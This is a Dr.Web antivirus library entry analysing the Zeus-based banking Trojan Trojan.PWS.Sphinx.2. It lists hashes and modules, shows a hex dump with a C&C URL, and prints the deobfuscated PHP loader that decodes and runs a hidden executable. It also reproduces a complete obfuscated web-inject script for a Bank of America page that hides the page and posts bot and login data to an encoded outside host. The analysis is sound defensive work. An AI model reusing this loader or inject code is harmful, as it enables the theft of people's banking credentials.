Defend what you create

Other Resources

Close

Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Trojan.PWS.Sphinx.2

Added to the Dr.Web virus database: 2017-02-01

Virus description added:

SHA1:

  • packed 4b86b7ec7371a98041391203d17fe731602c8fc0
  • unpacked ac745b2c36fd0529e7e27ba98e1032ad7a108d22
  • client32.dll ff82700ee26bbaf5a3357c5f5070fda9f80f9993
  • client64.dll c31d5caf4927cd5885112649a762a89c812913e0
  • vncdll32.dll a5e2fd98f1e8466700e20b690eed359f79a353bf
  • vncdll64.dll ce6a35afd9332439ac852f51fd9b60d7fd85362b

A banking Trojan based on the source code of Zeus (Trojan.PWS.Panda) and used mainly to perform web injects. The Trojan’s code is obfuscated. When launched, the malicious program embeds itself in the process of Explorer (explorer.exe) and decrypts the loader body and the configuration file in which the command and control (C&C) server’s address and encryption key are hidden.

6C 6C 31 75-63 76 68 75-77 6D 64 74-67 78 37 76  ll1ucvhuwmdtgx7v
71 72 35 65-31 74 36 39-33 69 65 67-67 6D 33 38  qr5e1t693ieggm38
00 78 74 34-6F 78 77 70-61 66 66 6E-38 61 64 38   xt4oxwpaffn8ad8
66 69 77 79-64 37 74 79-74 69 7A 7A-38 66 6B 75  fiwyd7tytizz8fku
39 76 77 69-69 65 6A 6C-68 35 6F 66-79 78 64 7A  9vwiiejlh5ofyxdz
32 67 6D 74-64 35 70 6B-72 34 65 77-6F 78 69 69  2gmtd5pkr4ewoxii
69 6F 67 68-73 36 38 31-30 31 31 37-00 6C 6B 78  ioghs6810117 lkx
38 69 6E 61-72 39 33 75-34 36 69 65-6A 68 70 6E  8inar93u46iejhpn
6E 62 74 71-78 72 32 73-73 37 6F 72-6A 6D 62 67  nbtqxr2ss7orjmbg
37 66 6D 77-66 7A 69 69-68 68 70 36-35 7A 78 78  7fmwfziihhp65zxx
6F 6D 78 33-34 66 74 79-73 64 70 32-72 38 69 68  omx34ftysdp2r8ih
74 74 70 3A-2F 2F 6E 6F-6F 6D 64 6F-6F 6D 73 61  ttp://noomdoomsa
64 69 6B 2E-63 63 2F 72-74 64 2F 72-6F 6B 66 6C  dik.cc/rtd/rokfl
2E 70 68 70-00 6A 32 6A-6E 63 65 6B-77 69 6B 75  .php j2jncekwiku
38 73 75 72-70 64 7A 78-33 32 39 6F-6F 68 39 63  8surpdzx329ooh9c
38 6B 6B 6D-39 70 69 62-36 70 79 37-6B 62 74 6A  8kkm9pib6py7kbtj
71 73 7A 70-62 72 35 6B-36 35 6D 74-61 6D 6D 6F  qszpbr5k65mtammo
6F 6F 39 69-6B 75 36 67-6A 65 64 38-6D 6A 67 6D  oo9iku6gjed8mjgm
32 39 71 6A-72 35 39 39-6D 6E 72 77-68 34 61 62  29qjr599mnrwh4ab
65 70 36 78-68 32 71 37-34 64 36 78-33 73 73 63  ep6xh2q74d6x3ssc
61 64 72 67-69 65 66 38-32 6B 71 69-64 61 36 68  adrgief82kqida6h
7A 33 71 71-63 77 38 6A-66 34 77 69-79 66 34 68  z3qqcw8jf4wiyf4h
6D 37 34 38-39 6F 37 31-31 37 39 72-6F 36 7A 32  m7489o71179ro6z2
6D 78 33 73-63 31 32 39-78 34 69 6D-69 77 75 38  mx3sc129x4imiwu8
38 77 36 37-61 34 6E 77-32 6E 79 71-63 6E 33 73  8w67a4nw2nyqcn3s
70 63 62 35-66 6A 35 39-61 65 6E 6C-72 36 6A 77  pcb5fj59aenlr6jw
37 66 39 69-69 6E 70 39-67 67 71 71-72 33 64 66  7f9iinp9ggqqr3df
68 77 6F 33-03 00 0D 00-75 6B 61 03-00 0D 00 73  hwo3♥ ♪ uka♥ ♪ s
79 73 7A 66-77 34 66 68-64 48 59 32-38 68 41 75  yszfw4fhdHY28hAu
69 6B 7A 68-00 70 75 61-32 6B 78 75-70 37 6C 68  ikzh pua2kxup7lh
70 72 33 61-37 69 31 75-78 6F 7A 33-72 61 68 39  pr3a7i1uxoz3rah9
70 37 64 66-75 6C 6E 39-71 70 79 61-75 62 6D 6A  p7dfuln9qpyaubmj

All the information shared between the Trojan and the C&C server is logged. The data is transmitted in the form of POST requests.

First, the Trojan requests that the modules be downloaded from the C&C server. In reply, the server sends it a container that includes plug-ins.

Currently, the following four modules are being downloaded from the server:

  • client32.dll—a module for performing web injects on a 32-bit OS.
  • client64.dll—a module for performing web injects on a 64-bit OS.
  • vncdll32.dll—a VNC module for a 32-bit OS.
  • vncdll64.dll—a VNC module for a 64-bit OS.

The last two modules are used to launch a VNC server that lets cybercriminals connect to the infected computer.

In addition, Trojan.PWS.Sphinx.2 downloads a set of utilities for installing a root digital certificate that can be used by cybercriminals to carry out MITM attacks.

  • certutil.exe
  • freebl3.dll
  • libnspr4.dll
  • libplc4.dll
  • libplds4.dll
  • msvcr100.dll
  • nss3.dll
  • nssdbm3.dll
  • nssutil3.dll
  • smime3.dll
  • softokn3.dll
  • sqlite3.dll

The Trojan uses a PHP script to launch itself. For this purpose, it saves two files on the infected computer:

  • php.exe
  • php5ts.dll

The script code is obfuscated. When deobfuscated, it looks as follows:

<?php $GLOBALS['2132652578']=Array('imagecopymergegray','strpos','strncmp','file_get_contents','fgets','file_put_contents','exec','unlink','strlen','mt_rand','strtr','chr','ord','mt_rand','strrchr','strpos','bin2hex');
?>
<?php
function _499671292($thgwox){
    $mwvttf=Array("\x3a\x1d\xf7\xe9\x09\x4d\xde\xce\x27\x5d\xc8\xcc\x19\x1b\xf2\xfe\x0d\x5b\xeb\xa1\x0a\x4d\xec\x93\x10\x4c\xdc\xab\xee\x49\xee\x9a\xf7\x5b\xc6\xbd\xde\x55\xc6\xb2\xec\x1f\xdc\xbc\xfd",
    "\x3a\x1d\xf7\xe9\x09\x4d\xde\xce\x27\x5d\xc8\xcc\x19\x1b\xf2\xfe\x0d\x5b\xeb\xa1\x0a\x4d\xec\x93\x10\x4c\xdc\xab\xee\x49\xee\x9a\xf7\x5b\xc6\xbd\xde\x55\xc6\xb2\xec\x1f\xdc\xbc\xfd\x1c\xd3\xbf\xe0",
    'fadrgfnjntmvfl',
    'daz',
    '',
    'sqwwhirkltslkcv',
    'fuwmz');
    return $mwvttf[$thgwox];
}
?>
<?php
$iqegybr=648723321;//round(0+129744664.2+129744664.2+129744664.2+129744664.2+129744664.2);
while(round(0+1457+1457)-round(0+1457+1457))
    imagecopymergegray($rhljwqh);
$trbedbh=_499671292(0);
$rhljwqh=_499671292(1);
$trbedbh=decodeString($trbedbh,$iqegybr); //C:\Users\tere1\AppData\Roaming\Yvtuy\erwo.izy
if(strpos(_499671292(2),_499671292(3))!==false)
    strncmp($iqegybr,$iqavsjx);
$rhljwqh=decodeString($rhljwqh,$iqegybr); //C:\Users\tere1\AppData\Roaming\Yvtuy\erwo.izy.exe
$ebcpnbn=file_get_contents($trbedbh);
if($ebcpnbn){
    $scfhmal=decodeString($ebcpnbn,$iqegybr);
    file_put_contents($rhljwqh,$scfhmal);
    exec($rhljwqh);
    while(!unlink($rhljwqh))
        Sleep(round(0+1));
    $soizplh=round(0+621.8+621.8+621.8+621.8+621.8);
}
function rol($key,$seed){
    $seed2=$seed&31;
    return($key << $seed2)|(($key >>(32-$seed2))&((1<<(31&$seed2))-1));
}
function decodeString($buf,$key){
    $out="";
    $n=strlen($buf);
    for($i=0;$i<$n;++$i){
        $sym=chr(ord($buf{$i})^($key&255));
        $out .= $sym;
         
        $key=rol($key,8);
        ++$key;
    }
    return $out;   
}
?>

The following shortcut is used to execute the script:

%HOMEPATH%\start menu\programs\startup\php.lnk

An example of a performed web inject:


set_url *.bankofamerica.com/ GP
data_before
<body>
data_end
data_inject
<script id="loader" type="text/javascript">
document.body.style.display = "none";
(function(){
var _0x7f7f=["\x53\x43\x52\x49\x50\x54","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x3F\x72\x61\x6E\x64\x3D","\x72\x61\x6E\x64\x6F\x6D","\x26","\x61\x6A\x61\x78\x5F\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x73\x63\x72\x69\x70\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6C\x6F\x61\x64\x65\x64","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x61\x70\x70\x6C\x79","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50","\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66","\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76","\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F","\x3D","","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function sendScriptRequest(_0xade3x2,_0xade3x3,_0xade3x4,_0xade3x5){var _0xade3x6=document[_0x7f7f[1]](_0x7f7f[0]);if(_0xade3x3){_0xade3x3=_0x7f7f[2]+Math[_0x7f7f[3]]()+_0x7f7f[4]+_0xade3x3;} else {_0xade3x3=_0x7f7f[2]+Math[_0x7f7f[3]]();} ;_0xade3x6[_0x7f7f[5]]=false;_0xade3x6[_0x7f7f[6]]=scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5);_0xade3x6[_0x7f7f[7]]=scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5);_0xade3x6[_0x7f7f[8]]=_0xade3x2+_0xade3x3;document[_0x7f7f[12]](_0x7f7f[11])[0][_0x7f7f[10]][_0x7f7f[9]](_0xade3x6);} ;function scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5){return function (){if(_0xade3x6[_0x7f7f[5]]){return ;} ;if(!_0xade3x6[_0x7f7f[13]]||_0xade3x6[_0x7f7f[13]]==_0x7f7f[14]||_0xade3x6[_0x7f7f[13]]==_0x7f7f[15]){_0xade3x6[_0x7f7f[5]]=true;_0xade3x4[_0x7f7f[16]](_0xade3x6,_0xade3x5);_0xade3x6[_0x7f7f[10]][_0x7f7f[17]](_0xade3x6);} ;} ;} ;function decode64(_0xade3x9){var _0xade3xa=_0x7f7f[18]+_0x7f7f[19]+_0x7f7f[20]+_0x7f7f[21]+_0x7f7f[22];var _0xade3xb=_0x7f7f[23];var _0xade3xc,_0xade3xd,_0xade3xe=_0x7f7f[23];var _0xade3xf,_0xade3x10,_0xade3x11,_0xade3x12=_0x7f7f[23];var _0xade3x13=0;var _0xade3x14=/[^A-Za-z0-9\+\/\=]/g;_0xade3x9=_0xade3x9[_0x7f7f[24]](/[^A-Za-z0-9\+\/\=]/g,_0x7f7f[23]);do{_0xade3xf=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x10=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x11=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x12=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3xc=(_0xade3xf<<2)|(_0xade3x10>>4);_0xade3xd=((_0xade3x10&15)<<4)|(_0xade3x11>>2);_0xade3xe=((_0xade3x11&3)<<6)|_0xade3x12;_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xc);if(_0xade3x11!=64){_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xd);} ;if(_0xade3x12!=64){_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xe);} ;_0xade3xc=_0xade3xd=_0xade3xe=_0x7f7f[23];_0xade3xf=_0xade3x10=_0xade3x11=_0xade3x12=_0x7f7f[23];} while(_0xade3x13<_0xade3x9[_0x7f7f[28]]);;return unescape(_0xade3xb);} ;
var bn = "US_" + "BOFA_2";
var bot_id = "%BOTID%_" + bn;
var sa = decode64("aHR0cHM6Ly9pbmJpd29vLmNvbS9hOHNkYXNkai9Ia2E5MGFsLnBocA==");
var req = "send=0&u_bot_id=" + bot_id + "&bn=" + bn + "&page=0&u_login=&u_pass=&log=" + 'get_me_core';
sendScriptRequest(sa, req, function statusCall1() {
   var element = document.getElementById("loader");
  element.parentNode.removeChild(element);
} );
 })();
</script>
data_end
...

Moreover, the Trojan has a grabber—a module that intercepts data entered by the user into various forms and then sends it to the cybercriminals. For this, the Trojan requests the corresponding filters from the C&C server.

All the information required for the Trojan’s operation is encrypted and stored in the Windows system registry. Registry branch names are generated automatically using a special algorithm.

Modules are saved to a separate file with a random extension, which is also encrypted.

News about the Trojan

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

The Russian developer of Dr.Web anti-viruses

Doctor Web has been developing anti-virus software since 1992

Dr.Web is trusted by users around the world in 200+ countries

The company has delivered an anti-virus as a service since 2007

24/7 tech support

© Doctor Web
2003 — 2020

Doctor Web is the Russian developer of Dr.Web anti-virus software. Dr.Web anti-virus software has been developed since 1992.

2-12А, 3rd street Yamskogo polya, Moscow, Russia, 125040